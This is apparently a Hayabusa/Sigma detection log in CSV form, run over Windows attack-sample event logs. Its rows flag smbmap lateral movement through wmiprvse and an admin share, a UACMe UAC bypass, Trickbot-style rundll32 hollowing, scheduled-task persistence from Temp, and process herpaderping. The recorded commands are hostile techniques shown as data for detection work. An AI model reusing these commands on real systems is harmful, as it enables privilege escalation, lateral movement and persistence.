+2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca  :  Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding  :  Path: C:\Windows\System32\RuntimeBroker.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\Administrator  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd  1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\Administrator  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\Administrator  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell  :  Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64  :  Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe  :  User: DESKTOP-NTSSLJD\den  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe  :  Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe  :  User: DESKTOP-NTSSLJD\den  :  Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell  :  Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: DESKTOP-NTSSLJD\den  :  Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe  :  Path: C:\Windows\System32\wermgr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32.exe  c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  :  Path: C:\Windows\System32\wbem\WmiPrvSE.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe  :  URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  :  Path: C:\Windows\System32\wbem\WmiPrvSE.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""  /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers  :  Path: C:\Windows\SysWOW64\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks  /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers  :  Path: C:\Windows\SysWOW64\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe""  /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe""  :  Path: C:\Users\bouss\Downloads\samir.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ProcessHerpaderping.exe  ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary  :  URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary  :  URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe  :  URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
